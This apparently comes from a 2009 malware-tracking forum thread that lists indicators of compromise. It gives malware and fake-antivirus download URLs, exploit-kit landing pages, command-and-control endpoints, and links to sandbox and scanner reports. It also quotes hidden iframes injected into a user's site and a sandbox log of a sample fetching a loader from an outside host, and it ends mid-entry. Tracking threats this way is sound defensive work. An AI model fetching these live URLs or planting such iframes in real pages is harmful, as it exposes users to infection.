091809.ru/bot.exehttp://www.virustotal.com/analisis/eabf8925b5e73d4a8c1ef091108c2144a506f953c2e392588d2b5c05189dc698-1243924307
Trojan Koobface:
videofx4you1.com/software/019d135faa/10180/1/Setup.exehttp://www.virustotal.com/analisis/e585df3a2b91e56951ecd6a03c73fd7b45b02e0ca2278130438b6467e823e202-1243924387
ultraphobia.com/ppcfile/godsname.exehttp://www.virustotal.com/analisis/8018cf6b613911e75f0a9f326bb4d18b86f3543cab781b21fa49893483c37804-1243924788
ultraphobia.com/ppcfile/freeserfer.exehttp://www.virustotal.com/analisis/da4177f7cec2b60dae6e7d67944b5ff54273c6d70549d63c4c6de584abece4a6-1243924927
Trojan Pinch:
treelives.cn/pnc/pexe.exehttp://www.virustotal.com/analisis/c0deb27bd735c3936bd84bd67d60b3c5450bffb6f051eb170370afb965a0dad1-1243925125
Exploits:
s76z.cn/data/http://wepawet.iseclab.org/view.php?hash=7bb7e6ca87c21a4310f276e54db9e102&t=1243847990&type=js
PDF:
s76z.cn/data/spl/pdf.pdfTrojan Oficla:
s76z.cn/data/exe.phphttp://www.virustotal.com/analisis/02c22fc3cd292700557f0a125a544225a51839754f3ad886ba38788f8e5aaa3f-1243815948
Exploits:
treelives.cn/ru/index.phphttp://wepawet.iseclab.org/view.php?hash=db13b96a3f07c2433da03c406fa21000&t=1243849201&type=js
PDF:
treelives.cn/ru/iepdf.php?f=newTrojan oficla:
treelives.cn/ru/load.phphttp://www.virustotal.com/analisis/bcb7eb7c10a161a08a16249e653bfcd0c26ac97941ac5760525c27edadf383d8-1243796149
-
iframe directs to pfre.php
lgmin.com/image/index.php
pdf exploit
lgmin.com/image/pfre.php
payload is
http://lgmin.com/image/ouet.phphttp://www.virustotal.com/analisis/27b6a8bd0b5ccdd6d621cec888108f6c4f6f809319fad724f5c6f1aa94124a39-1243963662 3/40
CAT-QuickHeal 10.00 2009.06.02 (Suspicious) - DNAScan
Microsoft 1.4701 2009.06.02 VirTool:Win32/Obfuscator.FH
Symantec 1.4.4.12 2009.06.02 Suspicious.MH690.A
http://www.threatexpert.com/report.aspx?md5=995a4928b9d1da62bcda2c1db6dd4898
AdPack cpanel is
lgmin.com/image/admin.php
same kind of stuff can be found at fastinate.com/image/...
-
Sites related Rogue Security Application
http://deluxe-protector.com/setup.exe
http://softwaredownloadcentercom.com/xpdel.exe
http://liveicqnetwork.cn/go.php?id=2018&key=56d5f0bd3&p=1
http://pricelessfinish.cn/go.php?id=2018-04&key=56d5f0bd3&p=1
http://pro-antivirus-scannerv2.com/1/?id=2018&smersh=c144eb244&back==TQ0yzz5McQNMI=M
http://safetywww.com/hitin.php?land=20&affid=20100
http://personal-antivirus-software.com/promo3/?aid=851
-
directs to "Messenger Infium" (trojan)
msnm.3eu.ru
albatros.ee/uploades/scr_dn/MInfium2009Final.exehttp://www.virustotal.com/analisis/9075621fd2b778431b576b9fef8ece2af86ff98f2f1516b62078f26b700f17c2-1244062941 2/40
K7AntiVirus 7.10.752 2009.06.02 Trojan.Win32.Malware.1
TheHacker 6.3.4.3.338 2009.06.03 Trojan/Agent.cikm
-
Exploit(wepawet seem to fail on this one)
091809.ru/s/in.phpPDF:
091809.ru/s/pdf.phphttp://wepawet.iseclab.org/view.php?hash=f5b00bed476324a303df8f4b4d8ac8c1&t=1244100976&type=js
seems like abit alterd variant of Emold trojan:
091809.ru/s/load.php?id=3http://www.virustotal.com/analisis/05e9c38100c6d59e834be1b848ab824eefe741d358e969d5e11cf6853d6ab7f5-1244100358
FTPstealer:
club25plus.de/css/vv.exehttp://www.virustotal.com/analisis/1db0daee62d2103eab7c84383e05505b6d6612aaef14da7641f1ceabd6d2f65a-1244101252
Trojan:
club25plus.de/css/frfr5.exehttp://www.virustotal.com/analisis/e8165bde7ebbcd65464ee27f7121128885e91b373ce83a3adb53e1e1975ec5d8-1244101967
Fake AV:
tubepornolive.com/scan/
Exploits:
bfegrtuker.ru/bede/in.phphttp://wepawet.iseclab.org/view.php?hash=09d36363e30de64fc262c747c8e54d68&t=1244102863&type=js
PDF:
bfegrtuker.ru/bede/its/0.pdfFlash:
bfegrtuker.ru/bede/its/0.swfTrojan Oficla:
bfegrtuker.ru/bede/load.php?id=5
Trojan:
000007.ru/1007.exehttp://www.virustotal.com/analisis/b35aec13c9d8d5b92fd3ba42eb753f36a89b1798dfcd1068c62243f9d0e38e04-1244102905
Trojan:
234871938123.cn/svcshostes.exehttp://www.virustotal.com/analisis/80fb3f643f85d8f09f3e5f533a52917dfae9c6e009899602577b6113dabf0ec7-1244103136
Trojans(all seem to be Rustock):
yayandex.com/1.exehttp://www.virustotal.com/analisis/c9ab5cd07f75505444777caebc1ba203c4d6a3cfa079516f5b231f5cbea4cb6c-1244103292
yayandex.com/2.exehttp://www.virustotal.com/analisis/34f7a41324eaaaefd45357ed16f89b8a9add7e839c54fc4897610fc831e56a44-1244103465
yayandex.com/3love.exehttp://www.virustotal.com/analisis/1f0f682ac26bc3c2c3d3153b282e09e68c97277b0dfc49f3a97519d42033410d-1244103873
all communicate with:
yabombs.com/1/getcfg.php
-
Fake/Scare scanner
http://antimalwareliveproscannerv3.com/1/?id=2018&smersh=c144eb244&back==TQ2yTDxNMQOMI=N
Fake flash player - downloads Rogue
http://big-pornnet.com/promo1/get.php?aid=780&vname=flash_player_v11
Couple of links on the rotators
http://top-pornnet.com/promo3/?aid=763&vname=flash_player.exe
http://mybig-portal.com/promo3/?aid=763&vname=protect.exe
-
Fake movie page:
tube-xxx-work.com/xplays.php?id=40016downloads:
exe-web-development.com/streamviewer.40016.exehttp://www.virustotal.com/analisis/76b8a3599fc04cfe7adecab36805615f82b7e73c8b8980f2ecbb3cd94cee5ba3-1244350815
Fake AV:
mysex-adult.com/promo1/soft/install-1557.exeRustock:
rarambler.com/ra/2.exehttp://www.virustotal.com/analisis/a67f6dcc6c43deaa623d88882cf591f742552615cc59cd3620cda86dbbbc618e-1244353129
Communicates with:
systemjud.com/start/admo/getcfg.php
-
Today a user reported the following:
i found these two in my site:
<iframe src=\"http://85.10.221.161/in.cgi?2\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>
<iframe src=\"http://global-analitics.com/in.cgi?2\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>
85.10.221.161/in.cgi?2
redirects to multiple exploits at
searchsuggest.cn/catalog/x.php?q=1
payload is
searchsuggest.cn/catalog/q.php?s=2'http://www.virustotal.com/analisis/ad7686eb5e40fa0b4a874bf06a605f2ed44e6a17a7e7df48c7c25064c42f400a-1243633951
I'm unable to download it from machine, don't know why.
The other url
global-analitics.com/in.cgi?2doesn't seem to work at the moment.
-
Payload;
/catalog/bookz.pdf
http://www.virustotal.com/analisis/3fcbd6e988183b20a18c13f6125d41bc6ee346c7dd5a198bee4e5de8fdabc927-1244385255
/catalog/next.exe
http://www.virustotal.com/analisis/ad7686eb5e40fa0b4a874bf06a605f2ed44e6a17a7e7df48c7c25064c42f400a-1244385214
I was only able to grab them by feeding it the correct referer (x.php?q=1)
I can't get the other one to work either .....
-
System Security rogue related sites
http://nicleaner.com/hitin.php?land=20&affid=02941
http://nicleaner.com/download.php?affid=02941
http://bestscanjet.com/index.php?affid=09300
http://bestscanjet.com/download.php?affid=09300
http://Dapcleaner.com/hitin.php?land=20&affid=02941
http://dapcleaner.com/download.php?affid=02941
http://sucleaner.com/index.php?affid=02941
http://sucleaner.com/download.php?affid=02941
http://Websecurityread.com/hitin.php?land=20&affid=02941
http://websecurityread.com/download.php?affid=02941
http://Spyscansolution.com/hitin.php?land=20&affid=02941
http://spyscansolution.com/download.php?affid=00000
-
http://e-point.com.ua/ratingz/load.php
Kaspersky - Trojan-Banker.Win32.Banker.aflq
McAfee verdict: PWS-Banker
-
Win PC Defender rogue
http://pornotube911.com/codec/186.exe
http://downloadfixandlove.com/pcdef.exe
http://downloadfixandlove.com/file.exe
Antivirus System Pro
antivir2009pro.com
Inetantivir.com
Inetantivirus.com
Inetavirus.com
209.44.111.57/block.php?r=8.0
-
onlinegames
2:http://61.160.247.37/xiao/aa1.exe
2:http://61.160.247.37/xiao/aa2.exe
2:http://61.160.247.37/xiao/aa3.exe
2:http://61.160.247.37/xiao/aa4.exe
2:http://61.160.247.37/xiao/aa5.exe
2:http://61.160.247.37/xiao/aa6.exe
2:http://61.160.247.37/xiao/aa7.exe
2:http://61.160.247.37/xiao/aa8.exe
2:http://61.160.247.37/xiao/aa9.exe
2:http://61.160.247.37/xiao/aa10.exe
2:http://61.160.247.37/xiao/aa11.exe
2:http://61.160.247.37/xiao/aa12.exe
2:http://61.160.247.37/xiao/aa13.exe
2:http://61.160.247.37/xiao/aa14.exe
2:http://61.160.247.37/xiao/aa15.exe
2:http://61.160.247.37/xiao/aa16.exe
2:http://61.160.247.37/xiao/aa17.exe
2:http://61.160.247.37/xiao/aa18.exe
2:http://61.160.247.37/xiao/aa19.exe
2:http://61.160.247.37/xiao/aa20.exe
2:http://61.160.247.37/xiao/aa21.exe
2:http://61.160.247.37/xiao/aa22.exe
2:http://61.160.247.37/xiao/aa23.exe
2:http://61.160.247.37/xiao/aa24.exe
2:http://61.160.247.37/xiao/aa25.exe
2:http://61.160.247.37/xiao/aa26.exe
2:http://61.160.247.37/xiao/aa27.exe
2:http://61.160.247.37/xiao/aa28.exe
2:http://61.160.247.37/xiao/aa29.exe
2:http://61.160.247.37/xiao/aa30.exe
2:http://61.160.247.37/xiao/aa31.exe
2:http://61.160.247.37/xiao/aa32.exe
2:http://61.160.247.37/xiao/aa33.exe
2:http://61.160.247.37/xiao/aa34.exe
2:http://61.160.247.37/xiao/aa35.exe
2:http://61.160.247.37/xiao/aa36.exe
2:http://61.160.247.37/xiao/1.exe
-
onlinegames
hxxp://121.12.115.11:886/down/aa01.exe
hxxp://121.12.115.11:886/down/aa02c.exe
hxxp://121.12.115.11:886/down/ts.exe
hxxp://121.12.115.11:886/down/aa03d.exe
hxxp://121.12.115.11:886/down/aa04b.exe
hxxp://121.12.115.11:886/down/aa21g.exe
hxxp://121.12.115.11:886/down/aa05b.exe
hxxp://121.12.115.11:886/down/aa06d.exe
hxxp://121.12.115.11:886/down/aa31b.exe
hxxp://121.12.115.11:886/down/aa08d.exe
hxxp://121.12.115.11:886/down/aa09a.exe
hxxp://121.12.115.11:886/down/aa10d.exe
hxxp://121.12.115.11:886/down/aa11a.exe
hxxp://121.12.115.11:886/down/aa12.exe
hxxp://121.12.115.11:886/down/aa13c.exe
hxxp://121.12.115.11:886/down/aa32e.exe
hxxp://121.12.115.11:886/down/aa33a.exe
hxxp://121.12.115.11:886/down/aa26d.exe
hxxp://121.12.115.11:886/down/aa27a.exe
hxxp://121.12.115.11:886/down/aa31b.exe
hxxp://121.12.115.11:886/down/aa15d.exe
hxxp://121.12.115.11:886/down/aa17.exe
hxxp://121.12.115.11:886/down/aa18a.exe
hxxp://121.12.115.11:886/down/aa19c.exe
hxxp://121.12.115.11:886/down/aa20a.exe
hxxp://121.12.115.11:886/down/aa29a.exe
hxxp://121.12.115.11:886/down/aa22.exe
hxxp://121.12.115.11:886/down/aa23a.exe
hxxp://121.12.115.11:886/down/aa24.exe
hxxp://121.12.115.11:886/down/aa25a.exe
hxxp://121.12.115.11:886/down/aa28.exe
hxxp://121.12.115.11:886/down/aa30.exe
hxxp://121.12.115.11:886/down/ms.exe
-
http://av-guard.net/?uid=102&pid=3
-
onlinegames
hxxp://www.2a8k.cn/d/51.exe
hxxp://www.2a8k.cn/d/50.exe
hxxp://www.2a8k.cn/d/29.exe
hxxp://www.2a8k.cn/d/13.exe
hxxp://www.2a8k.cn/d/24.exe
hxxp://www.2a8k.cn/d/25.exe
hxxp://www.2a8k.cn/d/35.exe
hxxp://www.2a8k.cn/d/34.exe
hxxp://www.2a8k.cn/d/33.exe
hxxp://www.2a8k.cn/d/36.exe
hxxp://www.2a8k.cn/d/42.exe
hxxp://www.2a8k.cn/d/39.exe
hxxp://www.2a8k.cn/d/43.exe
hxxp://www.2a8k.cn/d/22.exe
hxxp://www.2a8k.cn/d/23.exe
hxxp://www.2a8k.cn/d/26.exe
hxxp://www.2a8k.cn/d/27.exe
hxxp://www.2a8k.cn/d/32.exe
hxxp://www.2a8k.cn/d/28.exe
hxxp://www.2a8k.cn/d/8.exe
hxxp://www.2a8k.cn/d/21.exe
hxxp://www.2a8k.cn/d/20.exe
hxxp://www.2a8k.cn/d/11.exe
hxxp://www.2a8k.cn/d/19.exe
hxxp://www.2a8k.cn/d/10.exe
hxxp://www.2a8k.cn/d/18.exe
hxxp://www.2a8k.cn/d/9.exe
hxxp://www.2a8k.cn/d/3.exe
hxxp://www.2a8k.cn/d/4.exe
hxxp://www.2a8k.cn/d/7.exe
hxxp://www.2a8k.cn/d/2.exe
hxxp://www.2a8k.cn/d/17.exe
hxxp://www.2a8k.cn/d/16.exe
hxxp://www.2a8k.cn/d/15.exe
hxxp://www.2a8k.cn/d/14.exe
hxxp://www.2a8k.cn/d/12.exe
hxxp://www.2a8k.cn/d/1.exe
hxxp://5yttrre.cn/xx33.exe
hxxp://5yttrre.cn/xx13.exe
hxxp://5yttrre.cn/xx26.exe
hxxp://5yttrre.cn/xx27.exe
hxxp://5yttrre.cn/xx28.exe
hxxp://5yttrre.cn/xx29.exe
hxxp://5yttrre.cn/xx30.exe
hxxp://5yttrre.cn/xx31.exe
hxxp://5yttrre.cn/xx11.exe
hxxp://5yttrre.cn/xx9.exe
hxxp://5yttrre.cn/xx12.exe
hxxp://5yttrre.cn/xx14.exe
hxxp://5yttrre.cn/xx10.exe
hxxp://5yttrre.cn/xx39.exe
hxxp://5yttrre.cn/xx15.exe
hxxp://5yttrre.cn/xx32.exe
hxxp://5yttrre.cn/xx8.exe
hxxp://5yttrre.cn/xx17.exe
hxxp://5yttrre.cn/xx23.exe
hxxp://5yttrre.cn/xx20.exe
hxxp://5yttrre.cn/xx22.exe
hxxp://5yttrre.cn/xx25.exe
hxxp://5yttrre.cn/xx18.exe
hxxp://5yttrre.cn/xx19.exe
hxxp://5yttrre.cn/xx24.exe
hxxp://5yttrre.cn/xx6.exe
hxxp://5yttrre.cn/xx16.exe
hxxp://5yttrre.cn/xx3.exe
hxxp://5yttrre.cn/xx21.exe
hxxp://5yttrre.cn/xx5.exe
hxxp://5yttrre.cn/xx2.exe
hxxp://5yttrre.cn/xx4.exe
hxxp://5yttrre.cn/xx7.exe
hxxp://5yttrre.cn/xx1.exe
-
hxxp://u.987255.com/image/svchost.jpg
hxxp://u.987255.com/image/dd.jpg
hxxp://u.987255.com/image/bd.jpg
hxxp://a.05916.com:666/40.jpg
hxxp://u.987255.com/image/zy.jpg
hxxp://download.leeboo.com/Gvod15_286.exe
hxxp://download.leeboo.com/QvodSetup13_286.exe
hxxp://www.rtmmd.cn/h/5.exe
hxxp://58.215.79.176:88/b8.exe
hxxp://58.215.79.176:8080/b3.exe
hxxp://58.215.79.176:88/5.exe
hxxp://58.215.79.176:88/10.exe
hxxp://58.215.79.176:88/7.exe
hxxp://58.215.79.176:88/cpa.exe
hxxp://121.10.108.42/cj/1hqq.exe
hxxp://59.34.197.133/down/25.exe
hxxp://121.10.108.42/cj/2hqq.exe
hxxp://59.34.197.133/down/24.exe
hxxp://59.34.197.133/down/21.exe
hxxp://59.34.197.133/down/23.exe
hxxp://59.34.197.133/down/18.exe
hxxp://59.34.197.133/down/12.exe
hxxp://59.34.197.133/down/11.exe
hxxp://59.34.197.133/down/13.exe
hxxp://59.34.197.133/down/14.exe
hxxp://59.34.197.133/down/17.exe
hxxp://59.34.197.133/down/16.exe
hxxp://59.34.197.133/down/9.exe
hxxp://59.34.197.133/down/10.exe
hxxp://59.34.197.133/down/8.exe
hxxp://59.34.197.133/down/7.exe
hxxp://59.34.197.133/down/19.exe
hxxp://59.34.197.133/down/6.exe
hxxp://59.34.197.133/down/3.exe
hxxp://59.34.197.133/down/2.exe
hxxp://59.34.197.133/down/22.exe
hxxp://59.34.197.133/down/4.exe
hxxp://59.34.197.133/down/1.exe
-
FO
-
hxxp://alfafoxx.com/temp/find26.exe
hxxp://alfafoxx.com/temp/ret26.exe
hxxp://alfafoxx.com/temp/ldr26.exe
hxxp://www.alfafoxx.com/mldr/data/mbt.exe
-
Trojan:
hXXp://mediahousenamebuyvideo.cn:8080/load.phpVT 8/40
http://www.virustotal.com/sv/analisis/93a126695d599d3c50147010fe2f337155f211b8fd43256e9ec89c77e4ed84bb-1244666759 (http://www.virustotal.com/sv/analisis/93a126695d599d3c50147010fe2f337155f211b8fd43256e9ec89c77e4ed84bb-1244666759)
PDF:
hXXp://mediahousenamebuyvideo.cn:8080/cache/readme.pdfVT 15/40
http://www.virustotal.com/sv/analisis/948c50b18fcd2a2f71faf6257fcddcdacfa5ed55af17ceafecced4bdd8ebab8a-1244666624
Flash:
hXXp://mediahousenamebuyvideo.cn:8080/cache/flash.swfVT 22/39
http://www.virustotal.com/sv/analisis/8fa7088e7dae6ff5f9c4f5eaff14de22e2198b28946472486a5045e44d0d5b5d-1244666646
-
banker
hxxp://71.174.51.86/images/logout.jpg
-
jenesaisrien.com:8080/load.php
vds659.sivit.org:8080/load.php
shopmoviefestival.cn:8080/load.php
s72-38-121-90.static.comm.cgocable.net:8080/load.php
static-86-94.is.net.pl:8080/load.php
s15238535.onlinehome-server.info:8080/load.php
tweetwitter.com:8080/load.php
gianttopdiscover.cn:8080/load.php
247orders.com:8080/load.php
4-job.com:8080/load.php
server.edwinbuckley.co.uk:8080/load.php
infostore.ca:8080/load.php
roleski.pl:8080/load.php
wtssurvey.com:8080/load.php
findabigrig.cn:8080/load.php
shopmovieproduction.cn:8080/load.php
fancystarlight.com:8080/load.php
lomianki.com:8080/load.php
thegeekdude.com:8080/load.php
theadsensekid.com:8080/load.php
thehomename.cn:8080/load.php
eszafiry.com:8080/load.php
mlodapara.com:8080/load.php
obraczki.com:8080/load.php
readymixbet.cn:8080/load.php
namemartfilmlife.cn:8080/index.php
xbuzzer.com:8080/load.php
spigotinch.com:8080/load.php
smsconnectnow.com:8080/load.php
numberingcite.com:8080/load.php
typicalprecedent.com:8080/load.php
findyourbigidea.cn:8080/load.php
findbigthinkers.cn:8080/load.php
bigskytopguide.cn:8080/load.php
michaelsbestway2findalawyer.cn:8080/load.php
hugetopseek.cn:8080/load.php
VirusTotal (http://www.virustotal.com/analisis/01f8a46219acc32a149b4707bca32dfcca1d88fd794a27266a8f071a2845aea2-1244687707)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=fae47a0d3048e1609c253994ea368e79)
hxxp://78.109.29.116/new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=13441600&rnd=981633
-
redirects by telemedia.m77s[.]cn:
Wepawet (http://wepawet.iseclab.org/view.php?hash=d33a97ac078bb1833726bfcfbe9b9650&t=1244705876&type=js)
exploits:
f97q.cn/images/index.php
Wepawet (http://wepawet.cs.ucsb.edu/view.php?type=js&hash=9b458aab745351364b38a99f25e11da7&t=1244704241)
pdf:
f97q.cn/images/spl/pdf.pdf
Wepawet (http://wepawet.iseclab.org/view.php?hash=d0cb3cb6a3061e3a2c7e0ce31f5bb788&t=1244706026&type=js)
trojan:
f97q.cn/images/exe.php
VirusTotal (http://www.virustotal.com/analisis/612022bd60334f8b1b79d5887d5515fda41cda55340bfd9f516ae041f89a519a-1244561761) - 6/40 (15.00%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1fb5448a0ba130c0445cee1879e067d03&format=html)
From ANUBIS:1032 to 78.109.25.217:80 - [r99u.cn]
Request: GET /myl/464664.php?id=470261258&v=101&tm=33&b=9671316727
Response: 200 "OK"
Request: GET /myl/exe/loader.exe
Response: 200 "OK"
-
Trojan:
fer5woi.ru/1t.exeTrojan:
dirtylivesex.net/fuflo_v1.exehttp://www.virustotal.com/analisis/4784550551e642a6f133bfec4877af63a801d48f01e7fa6c33378abf1ed167e9-1244732363
Trojan:
rezident77.ru/files/s66.exehttp://www.virustotal.com/analisis/403f79bd1e23384be42728583872ba6eb43621db55c7a7aaea242f79938f8f24-1244732262
Exploits:
domainzzoom.ru/in.phphttp://wepawet.iseclab.org/view.php?hash=dacf686bc48b5f9aec70cc8cbc6b248e&t=1244731801&type=js
PDF:
domainzzoom.ru/pdf.phpfake AV:
domainzzoom.ru/load.php?id=2http://www.virustotal.com/analisis/d1c8dea9489502866622d1d45d0a0fe80eb06ede51b32484711416a96cd1df1f-1244731949
fake payment site:
securebillingsoftware.com/buy.php?affid=03500
-
redirects:
thelotmachine.cn:8080/in.cgi
thenetnameshop.cn:8080/in.cgi
compoundcapitolgroup.cn:8080/in.cgi
mixlotworld.cn:8080/in.cgi
superlottry.cn:8080/in.cgi
webnamemart.cn:8080/in.cgi
payloads:
adsl.141.255.0.72.maskatel.ca:8080/load.php
bunchguide.cn:8080/load.php
bigtopfindsite.cn:8080/load.php
bigtopfindsite.cn:8080/cache/readme.pdf
bigtopfindsite.cn:8080/cache/flash.swf
filmlifeimages.cn:8080/load.php
filmlifeimages.cn:8080/cache/readme.pdf
filmlifeimages.cn:8080/cache/flash.swf
findbigshots.cn:8080/load.php
findbigshots.cn:8080/cache/readme.pdf
findbigshots.cn:8080/cache/flash.swf
giantpremium.cn:8080/load.php
giantpremium.cn:8080/cache/readme.pdf
giantpremium.cn:8080/cache/flash.swf
gianttopnano.cn:8080/load.php
gianttopnano.cn:8080/cache/readme.pdf
gianttopnano.cn:8080/cache/flash.swf
mediahomenameshopmovie.cn:8080/load.php
mediahomenameshopmovie.cn:8080/cache/readme.pdf
mediahomenameshopmovie.cn:8080/cache/flash.swf
nameshopinternational.cn:8080/load.php
nameshopinternational.cn:8080/cache/readme.pdf
nameshopinternational.cn:8080/cache/flash.swf
newnetnameshop.cn:8080/load.php
newnetnameshop.cn:8080/cache/readme.pdf
newnetnameshop.cn:8080/cache/flash.swf
shopmovielife.cn:8080/load.php
shopmovielife.cn:8080/cache/readme.pdf
shopmovielife.cn:8080/cache/flash.swf
yournameshop.cn:8080/load.php
yournameshop.cn:8080/cache/readme.pdf
yournameshop.cn:8080/cache/flash.swf
exe:
http://www.virustotal.com/analisis/25db455ed35b759dc3a6924359bd72c37f9cc3b13edac98a96894e344d45078d-1244797876 (http://www.virustotal.com/analisis/25db455ed35b759dc3a6924359bd72c37f9cc3b13edac98a96894e344d45078d-1244797876)
http://anubis.iseclab.org/?action=result&task_id=1c7642f4324780a04014ee1900012c257 (http://anubis.iseclab.org/?action=result&task_id=1c7642f4324780a04014ee1900012c257)
pdf:
http://wepawet.iseclab.org/view.php?hash=d21d612330db155dcbd75191a9b7c021&t=1244801268&type=js (http://wepawet.iseclab.org/view.php?hash=d21d612330db155dcbd75191a9b7c021&t=1244801268&type=js)
flash:
http://wepawet.iseclab.org/view.php?hash=3e05fc4fd1c7a49f8478da9c76c7c435&type=swf (http://wepawet.iseclab.org/view.php?hash=3e05fc4fd1c7a49f8478da9c76c7c435&type=swf)
http://www.virustotal.com/analisis/8fa7088e7dae6ff5f9c4f5eaff14de22e2198b28946472486a5045e44d0d5b5d-1244133184 (http://www.virustotal.com/analisis/8fa7088e7dae6ff5f9c4f5eaff14de22e2198b28946472486a5045e44d0d5b5d-1244133184)
http://www.threatexpert.com/report.aspx?md5=7264e961f25beaa201906e4086caa1ce (http://www.threatexpert.com/report.aspx?md5=7264e961f25beaa201906e4086caa1ce)
-
http://nyfilmlife.cn:8080/index.phpleads to:
http://gianttoplocate.cn:8080/load.php?id=0
http://gianttoplocate.cn:8080/load.php?id=1
http://nyfilmlife.cn:8080/cache/readme.pdf
http://nyfilmlife.cn:8080/cache/flash.swf
http://gianttoplocate.cn:8080/landig.php?id=4
-
FO
-
Fake AV:
pornotube912.com/scan/Trojan:
194.33.180.41/rferfref5.exehttp://www.virustotal.com/analisis/5859892e44a0ab804ea7ec37b6313f089e2f47d87ee83c3528e84ccdea35e4a8-1245048501
Exploits:
rtm-books.co.uk/ad/index.phphttp://wepawet.iseclab.org/view.php?hash=7bba4edc1abb1608785379e50afad535&t=1245048299&type=js
PDF:
rtm-books.co.uk/ad/include/two.pdfTrojan:
rtm-books.co.uk/ad/load.phphttp://www.virustotal.com/analisis/4a92f221548e9c84903ab15ec49281ffd16f0c74ee4e075bbaab48f6dbeb8c19-1245048374
Exploits:
viva-delpinata2.com/2/index.phphttp://wepawet.iseclab.org/view.php?hash=cf45d657fe06a83f99b2d6518f4714ca&t=1245048311&type=js
PDF:
viva-delpinata2.com/2/notTheoryCites.pdfFlash:
viva-delpinata2.com/2/normalLeap.swfTrojan:
viva-delpinata2.com/2/update.phphttp://www.virustotal.com/analisis/3b21cb087180f5d3cc067d9fd8198b745635130038aa5587d7e3b1f4e9ee37c8-1245022898
-
New Rogue sites
protectionsystem.org
protectionsystemlab.com/psystem.exe
Core-guard-antivirus.com
fullguardlab.com
fullprotect.org
http://gosoonscan.com/?uid=13002
http://planscan4.info/download/install.php
http://ina4id.com/download/InternetAntivirusPro.exe
http://ina4id.com/download/file.exe
-
AV downloader
joomlaprojects.cn/file.exehttp://www.virustotal.com/analisis/a56d5fcf47517f96978014bee0d1ca5a67be4d9d2725643c9f91e947f2d48c1e-1245081896
Fake AV:
antivirus-2009-ppro.com/cgi-bin/download.pl?code=0000282http://www.virustotal.com/analisis/078c85cd91583f821aaf3d8c5588785fab192d32ae09a7fad5da0f45e668e2c7-1245082096
joomlaprojects.cn/install.exehttp://www.virustotal.com/analisis/7f041ff1df6e693585fdf1c5be1fb39c2de3d1c0f358ae35612c48da39ebbda9-1245082461
haos-in.ru/3_install.exehttp://www.virustotal.com/analisis/c60c9f6772c6416c366783b5edf8c96b619fcd86bdafdcb737bcd388cd7d668c-1245084099
Fake payment sites:
advanced-virusremover2009.com/buy/?code?code=0000282
https://www.securebillingsoftware.com/buy.php?affid=05100 (works with https only)
Trojan:
onuka.cn/dll/em.txthttp://www.virustotal.com/analisis/d979c2f805ce2e01d21e49aad39e3ff0f2aa7e98c86b0e5671a7c4868bfa5640-1245082890
Trojan:
218.6.12.82/winrar.exehttp://www.virustotal.com/analisis/b687f6673db5072334cb6a13f6d59f303cf3302258939b93403fb26bbae6e984-1245083262
-
redirects:
globalmixgroup.cn:8080/in.cgi
payloads:
bigbestlite.cn:8080/load.php
bigbestlite.cn:8080/cache/readme.pdf
bigbestlite.cn:8080/cache/flash.swf
bigtopfestival.cn:8080/load.php
bigtopfestival.cn:8080/cache/readme.pdf
bigtopfestival.cn:8080/cache/flash.swf
mixbetonline.cn:8080/load.php
mixbetonline.cn:8080/cache/readme.pdf
mixbetonline.cn:8080/cache/flash.pdf
themixbet.cn:8080/load.php
themixbet.cn:8080/cache/readme.pdf
themixbet.cn:8080/cache/flash.swf
VirusTotal (http://www.virustotal.com/analisis/e85beb2ea40aac707863221ce5189863288583550453b5ad3c19aa31aa2c6f9a-1245076415): 1/40
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=9e95cda3645f97fab3235ac21a625a2a)
-
Trojans:
almasto.net/ins.exe
biggerz.net/ins.exe
Camposceola.com/ins.exehttp://www.virustotal.com/analisis/33c3518f7555aa7b407570e8174133563621629ff2ff8e3c468ffca8da703f3b-1245123021
almasto.net/sdfsdf.exehttp://www.virustotal.com/analisis/3e9314888ad11497839781d9a4c9325e36caf86d59bc1ac7ece987e9c56a777b-1245122926
friendslinks.com/0/new.exehttp://www.virustotal.com/analisis/68fbe09bcbe4464d9644a57444d9e94f43fd04a2fe42a35ab0f0274cbf14f9ce-1245121971
xz.ub9.net/winres.exehttp://www.virustotal.com/analisis/396abb55f933c0df23e78582f5b13738bb799d260618959998f0245c058704f3-1245123148
heyjoy.cn/612.exehttp://www.virustotal.com/analisis/652c1cff90096824647b2377b4850fb47f4b6f6abe470eb0114f51d9de86a2a6-1245123263
Exploits:
almasto.net/lnk.php?embedded=falsehttp://wepawet.cs.ucsb.edu/view.php?hash=27262e8c3f678960412e6ecd940ccd3f&t=1245109604&type=js
Fake AV downloader:
friendslinks.com/0/loyalbox.exehttp://www.virustotal.com/analisis/776c883badde97f0577d6b11eb759ea9f85302a96d79f4446d3eb4e4399051a0-1245122144
porno-tube-xxx.us/loader/index.php?userid=id_0079http://www.virustotal.com/analisis/26e35006830b010d1d7c97541f1cf960e3b9e8d4d611e5b991132c1634fe92c2-1245122608
Fake AV:
you-adult-tube.co.cc/setup.exehttp://www.virustotal.com/analisis/f2dd78517405edeeacc4b06eab567a54e54b9306d18f02ed620a55cb45abbcbd-1245122729
gives koobface related malware links:
upr15may.com/ld/gen.php
-
FO
-
yag0yag0.co.cc/index2.phpwepawet seems to fail on this one.
http://jsunpack.jeek.org/dec/go?url=yag0yag0.co.cc_new_index2.php
flash:
yag0yag0.co.cc/new/i.swfhttp://wepawet.cs.ucsb.edu/view.php?hash=8fdc5af28af58910fedd022b60bd40f2&type=swf
Trojan:
yag0yag0.co.cc/new/img.phphttp://www.virustotal.com/analisis/40515c53fea41dcbf7aa7342dda135ee981781500d7b9c6750e9204a5f8ce091-1245293368
-
Fake AV:
ameraif.cn
amayrex.cn
adiosma.cn
ameycva.cn
apauzy.cn
securitytoolsworld.com
K00bface:
niceshoot89.com/software/04f456eca8/30000/1/Setup.exehttp://www.virustotal.com/analisis/33ee8d94223dc222cb5a4358f5ab4366dd3c4eeb43d2a7d2a2a3905c4e36cb25-1245307967
-
Koobface:
nicevideo18.net/software/ea2faf7008/11400/1/Setup.exe
Exploits:
adultfex.com/lb/index.phphttp://wepawet.iseclab.org/view.php?hash=ffcb0d874f69382bc4e54caf0b450406&t=1245563029&type=js
PDF:
adultfex.com/lb/humourAlwaysHumour.pdfFlash:
adultfex.com/lb/usesHumour.swfTrojan:
